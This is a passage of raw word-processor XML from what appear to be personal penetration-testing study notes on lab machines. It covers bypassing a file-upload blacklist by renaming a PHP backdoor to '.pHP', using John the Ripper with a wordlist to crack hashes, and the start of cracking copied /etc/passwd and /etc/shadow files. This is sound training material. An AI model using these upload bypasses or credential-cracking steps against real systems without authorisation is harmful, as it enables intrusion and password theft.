        <w:t xml:space="preserve">Another way we can bypass the filter is by changing characters in the file extension to upper case. The blacklist may be implemented by comparing the file extension of the uploaded file to a list of strings containing only lower-case PHP file extensions. If so, we can update the uploaded file extension with upper-case characters to bypass the filter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D60">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's try the second method, updating our </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">simple-backdoor.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file extension from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.pHP</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. After renaming the file either in the terminal or file explorer, we'll upload it via the web form.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D61">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1828800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Figure 17: Successful Upload of simple-backdoor.pHP" id="266" name="image279.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 17: Successful Upload of simple-backdoor.pHP" id="0" name="image279.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId608"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1828800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Figure 17: Successful Upload of simple-backdoor.pHP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D62">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This small change allowed us to bypass the filter and upload the file. Let's confirm if we can use it to execute code as we did in the RFI section. The output shows that our file was uploaded to the "uploads" directory, so we can assume there is a directory named "uploads".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D63">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D64">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D65">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D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67">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D68">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_6py8vu27jg7z" w:id="244"/>
      <w:bookmarkEnd w:id="244"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">John The Ripper</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D69">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Important: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you can't crack a hash, just try and online hash cracker. Like for the BTRSys2.1 PG Play, the MD5 hash couldn't be cracked on Kali, but an online hash cracker got it (crackstation)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D6A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D6B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D6C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to identify what type of hash you have: </w:t>
      </w:r>
      <w:hyperlink r:id="rId609">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">use this website!</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D6D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D6E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_s4dl5rlby808" w:id="245"/>
      <w:bookmarkEnd w:id="245"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">General</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D6F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D70">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to use John The Ripper:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D71">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">john --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA256 hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D72">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">replace "hash.txt" with your file that your hashes are located</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D73">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">replace "Raw-SHA256" with the type of hash you have</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D74">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you don't know the format, just don't include the -</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-format</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag and it will guess. HOWEVER, this is often a bad idea. Use</w:t>
      </w:r>
      <w:hyperlink r:id="rId610">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> the website above</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to identify type of hash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D75">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">john --show hash.txt or john</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--show --format=name_of_format hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D76">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Output: ?:qwerty789</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D77">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This means the password is qwerty789 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D78">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">? means no associated username</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: is the separator between username and password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You might need to add the "format" flag to specify which result you are showing, since if you use different formats for the same file, then they will each have their own results</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D7B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sometimes, if you can't see the passwords or if you lost the output, you can run this command to check John's internal session files to see what passwords it previous found that were associated with that file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D7C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D7D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you see this output:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D7E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1153"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using default input encoding: UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D7F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1153"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">No password hashes loaded (see FAQ)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D80">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then try doing </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat -A nameOfFile</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to see if there are any like blanks lines the hash.txt file, and remove those</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D81">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3176588" cy="772087"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="407" name="image402.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image402.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId611"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3176588" cy="772087"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D82">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="149"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Like here, the second line is a blank line since it starts with "$" which signifies there is text on that line, so remove that blank space</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D83">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D84">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_mh01aga8k16t" w:id="246"/>
      <w:bookmarkEnd w:id="246"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cracking /etc/passwd and /etc/shadow files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D85">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D86">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from </w:t>
      </w:r>
      <w:hyperlink r:id="rId612">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SunsetDecoy</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play</w:t>
      </w:r>
    </w:p>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this box, we got access to a /etc/passwd and /etc/shadow file, but we have no way to extract the encrypted information from it. So, we can crack both files to get plaintext information. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D89">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D8A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can use the unshadow command to get a file format that is compatible with john. First, copy both the /etc/passwd and /etc/shadow into another file, like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
